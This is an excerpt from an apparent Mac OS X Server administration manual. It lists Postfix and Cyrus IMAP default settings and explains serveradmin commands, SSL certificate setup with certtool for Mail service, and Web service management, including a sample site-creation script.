(mail:) Description LL2354.book Page 106 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 107 postfix:local_transport Default = "local:$myhostname" postfix:smtpd_helo_restrictions Default = no postfix:fork_delay Default = "1s" postfix:disable_mime_output_conversion Default = no postfix:mynetworks:_array_index:0 Default = "127.0.0.1/32" postfix:smtp_never_send_ehlo Default = no postfix:lmtp_cache_connection Default = yes postfix:local_recipient_maps Default = "proxy:unix:passwd.byname $alias_maps" postfix:smtpd_timeout Default = "300s" postfix:require_home_directory Default = no postfix:smtpd_error_sleep_time Default = "1s" postfix:helpful_warnings Default = yes postfix:mail_spool_directory Default = "/var/mail" postfix:mailbox_delivery_lock Default = "flock" postfix:disable_dns_lookups Default = no postfix:mailbox_command_maps Default = "" postfix:default_destination_concurrency _limit Default = 20 postfix:2bounce_notice_recipient Default = "postmaster" postfix:virtual_alias_maps Default = "$virtual_maps" postfix:mailq_path Default = "/usr/bin/mailq" postfix:recipient_delimiter Default = no postfix:masquerade_exceptions Default = "" postfix:delay_notice_recipient Default = "postmaster" postfix:smtp_helo_name Default = "$myhostname" postfix:flush_service_name Default = "flush" postfix:service_throttle_time Default = "60s" postfix:import_environment Default = "MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY" postfix:sun_mailtool_compatibility Default = no postfix:authorized_verp_clients Default = "$mynetworks" postfix:debug_peer_list Default = "" postfix:mime_boundary_length_limit Default = 2048 postfix:initial_destination_concurrency Default = 5 Parameter (mail:) Description LL2354.book Page 107 Monday, October 20, 2003 9:47 AM 108 Chapter 11 Working With Mail Service postfix:parent_domain_matches_subdomains Default = "debug_peer_list,fast_flu sh_domains,mynetworks,per mit_mx_backup_networks,qm qpd_authorized_clients,re lay_domains,smtpd_access_ maps" postfix:setgid_group Default = "postdrop" postfix:mime_header_checks Default = "$header_checks" postfix:smtpd_etrn_restrictions Default = "" postfix:relay_transport Default = "relay" postfix:inet_interfaces Default = "localhost" postfix:smtpd_sender_restrictions Default = "" postfix:delay_warning_time Default 
= "0h" postfix:alias_maps Default = "hash:/etc/aliases" postfix:sender_canonical_maps Default = "" postfix:trigger_timeout Default = "10s" postfix:newaliases_path Default = "/usr/bin/newaliases" postfix:default_rbl_reply Default = "$rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}" postfix:alias_database Default = "hash:/etc/aliases" postfix:qmgr_message_recipient_limit Default = 20000 postfix:extract_recipient_limit Default = 10240 postfix:header_checks Default = 0 postfix:syslog_facility Default = "mail" postfix:luser_relay Default = "" postfix:maps_rbl_domains:_array_index:0 Default = "" postfix:deliver_lock_attempts Default = 20 postfix:smtpd_data_restrictions Default = "" postfix:smtpd_pw_server_security_options: _array_index:0 Default = "none" postfix:ipc_idle Default = "100s" postfix:mail_version Default = "2.0.7" postfix:transport_retry_time Default = "60s" Parameter (mail:) Description LL2354.book Page 108 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 109 postfix:virtual_mailbox_limit Default = 51200000 postfix:smtpd_noop_commands Default = 0 postfix:mail_release_date Default = "20030319" postfix:append_at_myorigin Default = yes postfix:body_checks_size_limit Default = 51200 postfix:qmgr_message_active_limit Default = 20000 postfix:mail_name Default = "Postfix" postfix:masquerade_classes Default = "envelope_sender, header_sender, header_recipient" postfix:allow_min_user Default = no postfix:smtp_randomize_addresses Default = yes postfix:alternate_config_directories Default = no postfix:allow_percent_hack Default = yes postfix:process_id_directory Default = "pid" postfix:strict_rfc821_envelopes Default = no postfix:fallback_transport Default = 0 postfix:owner_request_special Default = yes postfix:default_transport Default = "smtp" postfix:biff Default = yes postfix:relay_domains_reject_code Default = 554 postfix:smtpd_delay_reject Default = yes postfix:lmtp_quit_timeout Default = "300s" postfix:lmtp_mail_timeout Default = "300s" postfix:fast_flush_purge_time Default = "7d" postfix:disable_verp_bounces Default = no postfix:lmtp_skip_quit_response Default = no postfix:daemon_directory Default = "/usr/libexec/postfix" postfix:default_destination_recipient_limit Default = 50 postfix:smtp_skip_quit_response Default = yes postfix:smtpd_recipient_limit Default = 1000 postfix:virtual_gid_maps Default = "" postfix:duplicate_filter_limit Default = 1000 postfix:rbl_reply_maps Default = "" postfix:relay_recipient_maps Default = 0 postfix:syslog_name Default = "postfix" Parameter (mail:) Description LL2354.book Page 109 Monday, October 20, 2003 9:47 AM 110 Chapter 11 Working With Mail Service postfix:queue_service_name Default = "qmgr" postfix:transport_maps Default = "" postfix:smtp_destination_concurrency_limit Default = "$default_destination_con currency_limit" postfix:virtual_mailbox_lock Default = "fcntl" postfix:qmgr_fudge_factor Default = 100 postfix:ipc_timeout Default = "3600s" postfix:default_delivery_slot_discount Default = 50 postfix:relocated_maps Default = "" postfix:max_use Default = 100 postfix:default_delivery_slot_cost Default = 5 postfix:default_privs Default = "nobody" postfix:smtp_bind_address Default = no postfix:nested_header_checks Default = "$header_checks" postfix:canonical_maps Default = no postfix:debug_peer_level Default = 2 postfix:in_flow_delay Default = "1s" postfix:smtpd_junk_command_limit Default = 100 postfix:program_directory Default = "/usr/libexec/postfix" 
postfix:smtp_quit_timeout Default = "300s" postfix:smtp_mail_timeout Default = "300s" postfix:minimal_backoff_time Default = "1000s" postfix:queue_file_attribute_count_limit Default = 100 postfix:body_checks Default = no postfix:smtpd_client_restrictions: _array_index:0 Default = "" postfix:mydestination:_array_index:0 Default = "$myhostname" postfix:mydestination:_array_index:1 Default = "localhost.$mydomain" postfix:error_service_name Default = "error" postfix:smtpd_sasl_security_options: _array_index:0 Default = "noanonymous" postfix:smtpd_null_access_lookup_key Default = "<>" postfix:virtual_uid_maps Default = "" postfix:smtpd_history_flush_threshold Default = 100 postfix:smtp_pix_workaround_threshold_time Default = "500s" Parameter (mail:) Description LL2354.book Page 110 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 111 postfix:showq_service_name Default = "showq" postfix:smtp_pix_workaround_delay_time Default = "10s" postfix:lmtp_sasl_security_options Default = "noplaintext, noanonymous" postfix:bounce_size_limit Default = 50000 postfix:qmqpd_timeout Default = "300s" postfix:allow_mail_to_files Default = "alias,forward" postfix:relay_domains Default = "$mydestination" postfix:smtpd_banner Default = "$myhostname ESMTP $mail_name" postfix:smtpd_helo_required Default = no postfix:berkeley_db_read_buffer_size Default = 131072 postfix:swap_bangpath Default = yes postfix:maximal_queue_lifetime Default = "5d" postfix:ignore_mx_lookup_error Default = no postfix:mynetworks_style Default = "host" postfix:myhostname Default = "<hostname>" postfix:default_minimum_delivery_slots Default = 3 postfix:recipient_canonical_maps Default = no postfix:hash_queue_depth Default = 1 postfix:hash_queue_names:_array_index:0 Default = "incoming" postfix:hash_queue_names:_array_index:1 Default = "active" postfix:hash_queue_names:_array_index:2 Default = "deferred" postfix:hash_queue_names:_array_index:3 Default = "bounce" postfix:hash_queue_names:_array_index:4 Default = "defer" postfix:hash_queue_names:_array_index:5 Default = "flush" postfix:hash_queue_names:_array_index:6 Default = "hold" postfix:lmtp_tcp_port Default = 24 postfix:local_command_shell Default = 0 postfix:allow_mail_to_commands Default = "alias,forward" postfix:non_fqdn_reject_code Default = 504 postfix:maximal_backoff_time Default = "4000s" postfix:smtp_always_send_ehlo Default = yes Parameter (mail:) Description LL2354.book Page 111 Monday, October 20, 2003 9:47 AM 112 Chapter 11 Working With Mail Service postfix:proxy_read_maps Default = "$local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks" postfix:propagate_unmatched_extensions Default = "canonical, virtual" postfix:smtp_destination_recipient_limit Default = "$default_destination_ recipient_limit" postfix:smtpd_restriction_classes Default = "" postfix:mime_nesting_limit Default = 100 postfix:virtual_mailbox_maps Default = "" postfix:bounce_service_name Default = "bounce" postfix:header_size_limit Default = 102400 postfix:strict_8bitmime Default = no postfix:virtual_transport Default = "virtual" postfix:berkeley_db_create_buffer_size Default = 16777216 postfix:broken_sasl_auth_clients Default = no postfix:home_mailbox Default = no postfix:content_filter Default = "" postfix:forward_path Default = "$home/.forward${recipien t_delimiter}${extension}, 
$home/.forward" postfix:qmqpd_error_delay Default = "1s" postfix:manpage_directory Default = "/usr/share/man" postfix:hopcount_limit Default = 50 postfix:unknown_virtual_alias_reject_code Default = 550 postfix:smtpd_sender_login_maps Default = "" postfix:rewrite_service_name Default = "rewrite" postfix:unknown_address_reject_code Default = 450 Parameter (mail:) Description LL2354.book Page 112 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 113 postfix:append_dot_mydomain Default = yes postfix:command_expansion_filter Default = "1234567890!@%- _=+:,./abcdefghijklmnopqr stuvwxyzABCDEFGHIJKLMNOPQ RSTUVWXYZ" postfix:default_extra_recipient_limit Default = 1000 postfix:lmtp_data_done_timeout Default = "600s" postfix:myorigin Default = "$myhostname" postfix:lmtp_data_init_timeout Default = "120s" postfix:lmtp_data_xfer_timeout Default = "180s" postfix:smtp_data_done_timeout Default = "600s" postfix:smtp_data_init_timeout Default = "120s" postfix:smtp_data_xfer_timeout Default = "180s" postfix:default_delivery_slot_loan Default = 3 postfix:reject_code Default = 554 postfix:command_directory Default = "/usr/sbin" postfix:lmtp_rcpt_timeout Default = "300s" postfix:smtp_sasl_security_options Default = "noplaintext, noanonymous" postfix:access_map_reject_code Default = 554 postfix:smtp_helo_timeout Default = "300s" postfix:bounce_notice_recipient Default = "postmaster" postfix:smtp_connect_timeout Default = "30s" postfix:fault_injection_code Default = 0 postfix:unknown_client_reject_code Default = 450 postfix:virtual_minimum_uid Default = 100 postfix:fast_flush_domains Default = "$relay_domains" postfix:default_database_type Default = "hash" postfix:dont_remove Default = 0 postfix:expand_owner_alias Default = no postfix:max_idle Default = "100s" postfix:defer_transports Default = "" postfix:qmgr_message_recipient_minimum Default = 10 postfix:invalid_hostname_reject_code Default = 501 postfix:fork_attempts Default = 5 postfix:allow_untrusted_routing Default = no imap:tls_cipher_list:_array_index:0 Default = "DEFAULT" Parameter (mail:) Description LL2354.book Page 113 Monday, October 20, 2003 9:47 AM 114 Chapter 11 Working With Mail Service imap:umask Default = "077" imap:tls_ca_path Default = "" imap:pop_auth_gssapi Default = yes imap:sasl_minimum_layer Default = 0 imap:tls_cert_file Default = "" imap:poptimeout Default = 10 imap:tls_sieve_require_cert Default = no imap:mupdate_server Default = "" imap:timeout Default = 30 imap:quotawarn Default = 90 imap:enable_pop Default = no imap:mupdate_retry_delay Default = 20 imap:tls_session_timeout Default = 1440 imap:postmaster Default = "postmaster" imap:defaultacl Default = "anyone lrs" imap:tls_lmtp_key_file Default = "" imap:newsprefix Default = "" imap:userprefix Default = "Other Users" imap:deleteright Default = "c" imap:allowplaintext Default = yes imap:pop_auth_clear Default = no imap:imapidresponse Default = yes imap:sasl_auto_transition Default = no imap:mupdate_port Default = "" imap:admins:_array_index:0 Default = "cyrus" imap:plaintextloginpause Default = 0 imap:popexpiretime Default = 0 imap:pop_auth_any Default = no imap:sieve_maxscriptsize Default = 32 imap:hashimapspool Default = no imap:tls_lmtp_cert_file Default = "" imap:tls_sieve_key_file Default = "" imap:sievedir Default = "/usr/sieve" imap:debug_command Default = "" imap:popminpoll Default = 0 imap:tls_lmtp_require_cert Default = no Parameter (mail:) Description LL2354.book Page 114 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 115 
imap:tls_ca_file Default = "" imap:sasl_pwcheck_method Default = "auxprop" imap:postuser Default = "" imap:sieve_maxscripts Default = 5 imap:defaultpartition Default = "default" imap:altnamespace Default = yes imap:max_imap_connections Default = 100 imap:tls_imap_cert_file Default = "" imap:sieveusehomedir Default = no imap:reject8bit Default = no imap:tls_sieve_cert_file Default = "" imap:imapidlepoll Default = 60 imap:srvtab Default = "/etc/srvtab" imap:imap_auth_login Default = no imap:tls_pop3_cert_file Default = "" imap:tls_pop3_require_cert Default = no imap:lmtp_overquota_perm_failure Default = no imap:tls_imap_key_file Default = "" imap:enable_imap Default = no imap:tls_require_cert Default = no imap:autocreatequota Default = 0 imap:allowanonymouslogin Default = no imap:pop_auth_apop Default = yes imap:partition-default Default = "/var/spool/imap" imap:imap_auth_cram_md5 Default = no imap:mupdate_password Default = "" imap:idlesocket Default = "/var/imap/socket/idle" imap:allowallsubscribe Default = no imap:singleinstancestore Default = yes imap:unixhierarchysep Default = "yes" imap:mupdate_realm Default = "" imap:sharedprefix Default = "Shared Folders" imap:tls_key_file Default = "" imap:lmtpsocket Default = "/var/imap/socket/lmtp" Parameter (mail:) Description LL2354.book Page 115 Monday, October 20, 2003 9:47 AM 116 Chapter 11 Working With Mail Service Mail serveradmin Commands You can use the following commands with the serveradmin application to manage Mail service. imap:configdirectory Default = "/var/imap" imap:sasl_maximum_layer Default = 256 imap:sendmail Default = "/usr/sbin/sendmail" imap:loginuseacl Default = no imap:mupdate_username Default = "" imap:imap_auth_plain Default = no imap:imap_auth_any Default = no imap:duplicatesuppression Default = yes imap:notifysocket Default = "/var/imap/socket/notify" imap:tls_imap_require_cert Default = no imap:imap_auth_clear Default = yes imap:tls_pop3_key_file Default = "" imap:proxyd_allow_status_referral Default = no imap:servername Default = "<hostname>" imap:logtimestamps Default = no imap:imap_auth_gssapi Default = no imap:mupdate_authname Default = "" mailman:enable_mailman Default = no Parameter (mail:) Description Command (mail:command=) Description getHistory View a periodic record of file data throughput or number of user connections. See “Listing Mail Service Statistics” on page 117. getLogPaths Display the locations of the Mail service logs. See “Viewing the Mail Service Logs” on page 118. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 116 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 117 Listing Mail Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of user connections and the data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command mail:command = getHistory mail:variant = statistic mail:timeScale = scale Control-D Output mail:nbSamples = <samples> mail:v2Legend = "throughput" mail:samplesArray:_array_index:0:vn = <sample> mail:samplesArray:_array_index:0:t = <time> mail:samplesArray:_array_index:1:vn = <sample> mail:samplesArray:_array_index:1:t = <time> [...] 
mail:samplesArray:_array_index:i:vn = <sample> mail:samplesArray:_array_index:i:t = <time> mail:v1Legend = "connections" afp:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of connected users (average during sampling period) v2 - data throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 24 hours of data, you would specify mail:timeScale = 86400. Value displayed by getHistory Description <samples> The total number of samples listed. <sample> The numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 117 Monday, October 20, 2003 9:47 AM 118 Chapter 11 Working With Mail Service Viewing the Mail Service Logs You can use tail or any other file listing tool to view the contents of the Mail service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the Mail service logs are located. To display the log locations: $ sudo serveradmin command mail:command = getLogPaths Output mail:Server Log = <server-log> mail:Lists qrunner = <lists-log> mail:Lists post = <postings-log> mail:Lists smtp = <delivery-log> mail:Lists subscribe = <subscriptions-log> mail:SMTP Log = <smtp-log> mail:POP Log = <pop-log> mail:Lists error = <listerrors-log> mail:IMAP Log = <imap-log> mail:Lists smtp-failure = <failures-log> Value Description <server-log> The location of the server log. Default = srvr.log <lists-log> The location of the Mailing Lists log. Default = /private/var/mailman/logs/qrunner <postings-log> The location of the Mailing Lists Postings log. Default = /private/var/mailman/logs/post <delivery-log> The location of the Mailing Lists Delivery log. Default = /private/var/mailman/logs/smtp <subscriptions-log> The location of the Mailing Lists Subscriptions log. Default = /private/var/mailman/logs/subscribe <smtp-log> The location of the server log. Default = smtp.log <pop-log> The location of the server log. Default = pop3.log <listerrors-log> The location of the Mailing Lists Error log. Default = /private/var/mailman/logs/error <imap-log> The location of the server log. Default = imap.log <failures-log> The location of the Mailing Lists Delivery Failures log. Default = /private/var/mailman/logs/smtp-failure LL2354.book Page 118 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 119 Setting Up SSL for Mail Service Mail service requires some configuration to provide Secure Sockets Layer (SSL) connections automatically. The basic steps are as follows: • Generate a Certificate Signing Request (CSR) and create a keychain. • Obtain an SSL certificate from an issuing authority. • Import the SSL certificate into the keychain. • Create a passphrase file. Generating a CSR and Creating a Keychain To begin configuring Mail service for SSL connections, you generate a CSR and create a keychain by using the command-line tool certtool. A CSR is a file that provides information needed to issue an SSL certificate. 1 Log in to the server as root. 
2 In the Terminal application, type the following two commands: $ cd /private/var/root/Library/Keychains/ $ /usr/bin/certtool r csr.txt k=certkc c This use of the certtool command begins an interactive process that generates a Certificate Signing Request (CSR) in the file csr.txt and creates a keychain named certkc. 3 In the New Keychain Passphrase dialog that appears, enter a passphrase or password for the keychain you’re creating, enter the password or passphrase a second time to verify it, and click OK. Remember this passphrase, because later you must supply it again. 4 When “Enter key and certificate label:” appears in the Terminal window, type a one- word key, a blank space, and a one-word certificate label, then press Return. For example, you could type your organization’s name as the key and mailservice as the certificate label. 5 Type r when prompted to select a key algorithm, then press Return. Please specify parameters for the key pair you will generate. r RSA d DSA f FEE Select key algorithm by letter: 6 Type a key size at the next prompt, then press Return. Valid key sizes for RSA are 512..2048; default is 512 Enter key size in bits or CR for default: Larger key sizes are more secure, but require more processing time on your server. Key sizes smaller than 1024 aren’t accepted by some certificate-issuing authorities. LL2354.book Page 119 Monday, October 20, 2003 9:47 AM 120 Chapter 11 Working With Mail Service 7 Type y when prompted to confirm the algorithm and key size, then press Return. You have selected algorithm RSA, key size (size entered above) bits. OK (y/anything)? 8 Type b when prompted to specify how this certificate will be used, then press Return. Enter cert/key usage (s=signing, b=signing AND encrypting): 9 Type s when prompted to select a signature algorithm, then press Return. ...Generating key pair... Please specify the algorithm with which your certificate will be signed. 5 RSA with MD5 s RSA with SHA1 Select signature algorithm by letter: 10 Type y when asked to confirm the selected algorithm, then press Return. You have selected algorithm RSA with SHA1. OK (y/anything)? 11 Enter a phrase or some random text when prompted to enter a challenge string, then press Return. ...creating CSR... Enter challenge string: 12 Enter the correct information at the next five prompts, which request the various components of the certificate’s Relative Distinguished Name (RDN), pressing return after each entry. For Common Name, enter the server's DNS name, such as server.example.com. For Country, enter the country in which your organization is located. For Organization, enter the organization to which your domain name is registered. For Organizational Unit, enter something similar to a department name. For State/Province, enter the full name of your state or province. 13 Type y when asked to confirm the information you entered, then press Return. Is this OK (y/anything)? When you see a message about writing to csr.txt, you have successfully generated a CSR and created the keychain that Mail service needs for SSL connections. Wrote (n) bytes of CSR to csr.txt LL2354.book Page 120 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 121 Obtaining an SSL Certificate After generating a CSR and a keychain, you continue configuring Mail service for automatic SSL connections by purchasing an SSL certificate from a certificate authority such as Verisign or Thawte. You can do this by completing a form on the certificate authority’s website. 
When prompted for your CSR, open the csr.txt file using a text editor such as TextEdit. Then copy and paste the contents of the file into the appropriate field on the certificate authority’s website. The websites for these certificate authorities are at • www.verisign.com • www.thawte.com When you receive your certificate, save it in a text file named sslcert.txt. You can save this file with the TextEdit application. Make sure the file is plain text, not rich text, and contains only the certificate text. Importing an SSL Certificate Into the Keychain To import an SSL certificate into a keychain, use the command-line tool certtool. This continues the configuration of Mail service for automatic SSL connections. 1 Log in to the server as root. 2 Open the Terminal application. 3 Go to the directory where the saved certificate file is located. For example, type cd /private/var/root/Desktop and press Return if the certificate file is saved on the desktop of the root user. 4 Type the following command and press Return: certtool i sslcert.txt k=certkc Using certtool this way imports a certificate from the file named sslcert.txt into the keychain named certkc. A message on screen confirms that the certificate was successfully imported. ...certificate successfully imported. LL2354.book Page 121 Monday, October 20, 2003 9:47 AM 122 Chapter 11 Working With Mail Service Creating a Passphrase File To create a passphrase file, you will use TextEdit, then change the privileges of the file using the Terminal application. This file contains the passphrase you specified when you created the keychain. Mail service will automatically use the passphrase file to unlock the keychain that contains the SSL certificate. This concludes configuring Mail service for automatic SSL connections. 1 Log in to the server as root (if you’re not already logged in as root). 2 In TextEdit, create a new file and type the passphrase exactly as you entered it when you created the keychain. Don’t press Return after typing the passphrase. 3 Make the file plain text by choosing Make Plain Text from the Format menu. 4 Save the file, naming it cerkc.pass. 5 Move the file to the root keychain folder. The path is /private/var/root/Library/Keychains/. To see the root keychain folder in the Finder, choose Go to Folder from the Go menu, then type /private/var/root/Library/Keychains/ and click Go. 6 In the Terminal application, change the access privileges to the passphrase file so only root can read and write to this file. Do this by typing the following two commands, pressing Return after each one: cd /private/var/root/Library/Keychains/ chmod 600 certkc.pass Mail service of Mac OS X Server can now use SSL for secure IMAP connections. 7 Log out as root. Note: If Mail service is running, you need to stop it and start it again to make it recognize the new certificate keychain. Setting Up SSL for Mail Service on a Headless Server If you want to set up SSL for Mail service on a server that doesn’t have a display, first follow the instructions in the sections: • “Generating a CSR and Creating a Keychain” on page 119 • “Obtaining an SSL Certificate” on page 121 • “Importing an SSL Certificate Into the Keychain” on page 121 • “Creating a Passphrase File” on this page Then copy the keychain file “certkc” and the keychain passphrase file “certkc.pass” to the root keychain folder on the headless server. The path on the headless server is /private/var/root/Library/Keychains/. 
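One way to copy the two keychain files to the headless server is over SSH with scp. This is a general sketch rather than a required step; the host name headless.example.com is a placeholder, and it assumes Remote Login (SSH) is enabled on the destination server:
$ cd /private/var/root/Library/Keychains/
$ scp certkc certkc.pass root@headless.example.com:/private/var/root/Library/Keychains/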
LL2354.book Page 122 Monday, October 20, 2003 9:47 AM 12 123 12 Working With Web Technologies Commands you can use to manage Web service in Mac OS X Server. Starting and Stopping Web Service To start Web service: $ sudo serveradmin start web To stop Web service: $ sudo serveradmin stop web Checking Web Service Status To see if Web service is running: $ sudo serveradmin status web To see complete Web service status: $ sudo serveradmin fullstatus web Viewing Web Settings You can use serveradmin to view your server’s Web service configuration. However, if you want to work with the Web service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Apache web server. For information on Apache settings, visit www.apache.org. To list all Web service settings: $ sudo serveradmin settings web To list a particular setting: $ sudo serveradmin settings web:setting LL2354.book Page 123 Monday, October 20, 2003 9:47 AM 124 Chapter 12 Working With Web Technologies To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings web:IFModule:_array_id:mod_alias.c:* Changing Web Settings You can use serveradmin to modify your server’s Web service configuration. However, if you want to work with the Web service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Apache web server. For information on Apache, visit www.apache.org. serveradmin and Apache Settings The parameters are written differently in the Apache configuration file than they are in serveradmin. For example, this block of Apache configuration parameters <IfModule mod_macbinary_apple.c> MacBinary On MacBinaryBlock html shtml perl pl cgi jsp php phps asp scpt MacBinaryBlock htaccess </IfModule> appear as follows in serveradmin web:IfModule:_array_id:mod_macbinary_apple.c:MacBinary = yes web:IfModule:_array_id:mod_macbinary_apple.c:MacBinaryBlock:_array_index:0 = "html shtml perl pl cgi jsp php phps asp scpt" web:IfModule:_array_id:mod_macbinary_apple.c:MacBinaryBlock:_array_index:1 = "htaccess". For information on Apache settings, visit www.apache.org. Changing Settings Using serveradmin You can change Web service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings web:setting = value Parameter Description setting A Web service setting. To see a list of available settings, type $ sudo serveradmin settings web value An appropriate value for the setting. LL2354.book Page 124 Monday, October 20, 2003 9:47 AM Chapter 12 Working With Web Technologies 125 To change several settings: $ sudo serveradmin settings web:setting = value web:setting = value web:setting = value [...] Control-D Web serveradmin Commands You can use the following commands with the serveradmin application to manage Web service. Listing Hosted Sites You can use the serveradmin getSites command to display a list of the sites hosted by the server along with basic settings and status. To list sites: $ sudo serveradmin command web:command = getSites Viewing Service Logs You can use tail or any other file listing tool to view the contents of Web service access and error logs for each site hosted by the server. 
To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current error and activity logs for each site are located. To display the log paths: $ sudo serveradmin command web:command = getLogPaths Command (web:command=) Description getHistory View Web service statistics. See “Viewing Service Statistics” on page 126. getLogPaths Finding the access and error logs for each hosted site. See “Viewing Service Logs” on this page. getSites Listing existing sites. See “Listing Hosted Sites” on this page. LL2354.book Page 125 Monday, October 20, 2003 9:47 AM 126 Chapter 12 Working With Web Technologies Viewing Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of requests, cache performance, and data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command qtss:command = getHistory qtss:variant = statistic qtss:timeScale = scale Control-D Output web:nbSamples = <samples> web:samplesArray:_array_index:0:vn = <sample> web:samplesArray:_array_index:0:t = <time> web:samplesArray:_array_index:1:vn = <sample> web:samplesArray:_array_index:1:t = <time> [...] web:samplesArray:_array_index:i:vn = <sample> web:samplesArray:_array_index:i:t = <time> web:vnLegend = "<legend>" web:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of requests per second v2 - throughput (bytes/sec) v3 - cache requests per second v4 - cache throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify qtss:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "REQUESTS_PER_SECOND" for v1 "THROUGHPUT" for v2 "CACHE_REQUESTS_PER_SECOND" for v3 "CACHE_THROUGHPUT" for v4 <sample> The numerical value of the sample. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 126 Monday, October 20, 2003 9:47 AM Chapter 12 Working With Web Technologies 127 Example Script for Adding a Website The following script shows how you can use serveradmin to add a website to the server’s Web service configuration. The script uses two files: • addsite The actual script you run. It accepts values for the site’s IP address, port number, server name, and root directory and uses sed to substitute these values in the settings it reads from the second file (addsite.in) feeds to serveradmin. • addsite.in Contains the actual settings (with placeholders for values you provide when you run addsite) used to create the website. 
The addsite File sed -es#_ipaddr#$1#g -es#_port#$2#g -es#_servername#$3#g -es#_docroot#$4#g ./addsite.in | /usr/sbin/serveradmin --set -i The addsite.in File web:Sites:_array_id:_ipaddr\:_port__servername = create web:Sites:_array_id:_ipaddr\:_port__servername:Listen:_array_index:0 = "_ipaddr:_port" web:Sites:_array_id:_ipaddr\:_port__servername:ServerName = _servername web:Sites:_array_id:_ipaddr\:_port__servername:ServerAdmin = admin@_servername web:Sites:_array_id:_ipaddr\:_port__servername:DirectoryIndex:_array_index:0 = "index.html" web:Sites:_array_id:_ipaddr\:_port__servername:DirectoryIndex:_array_index:1 = "index.php" web:Sites:_array_id:_ipaddr\:_port__servername:WebMail = yes web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Format = "%{User-agent}i" web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: enabled = yes web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: ArchiveInterval = 0 web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Path = "/private/var/log/httpd/access_log" web:Sites:_array_id:_ipaddr\:_port__servername:CustomLog:_array_index:0: Archive = yes web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:Options:Indexes = yes web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:Options:ExecCGI = no web:Sites:_array_id:_ipaddr\:_port__servername:Directory:_array_id: /Library/WebServer/Documents:AuthName = "Test Site" web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:ArchiveInterval = 0 web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:Path = "/private/var/log/httpd/error_log" web:Sites:_array_id:_ipaddr\:_port__servername:ErrorLog:Archive = no web:Sites:_array_id:_ipaddr\:_port__servername:Include:_array_index:0 = "/etc/httpd/httpd_squirrelmail.conf" web:Sites:_array_id:_ipaddr\:_port__servername:enabled = yes LL2354.book Page 127 Monday, October 20, 2003 9:47 AM 128 Chapter 12 Working With Web Technologies web:Sites:_array_id:_ipaddr\:_port__servername:ErrorDocument:_array_index:0: StatusCode = 404 web:Sites:_array_id:_ipaddr\:_port__servername:ErrorDocument:_array_index:0: Document = "/nwesite_notfound.html" web:Sites:_array_id:_ipaddr\:_port__servername:LogLevel = "warn" web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLEngine = no web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLPassPhrase = "" web:Sites:_array_id:_ipaddr\:_port__servername:IfModule:_array_id:mod_ssl.c: SSLLog = "/private/var/log/httpd/ssl_engine_log" web:Sites:_array_id:_ipaddr\:_port__servername:DocumentRoot = "_docroot" web:Sites:_array_id:_ipaddr\:_port__servername To run the script: $ addsite ipaddress port name root If you get the message “command not found” when you try to run the script, precede the command with the full path to the script file. For example, /users/admin/documents/addsite 10.0.0.2 80 corpsite /users/webmaster/sites/corpsite Or, use cd to change to the directory that contains the file and precede the command with ./. For example: $ cd /users/admin/documents $ ./addsite 10.0.0.2 80 corpsite /users/webmaster/sites/corpsite Parameter Description ipaddress The IP address for the site. port The port number to be used to for HTTP access to the site. name The name of the site. root The root directory for the site’s files and subdirectories. 
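To see exactly what addsite feeds to serveradmin, you can run the same sed substitution by hand on a single line of addsite.in. This is only an illustration; it uses the sample values from the usage example above (10.0.0.2, 80, and corpsite) and shows the expected result:

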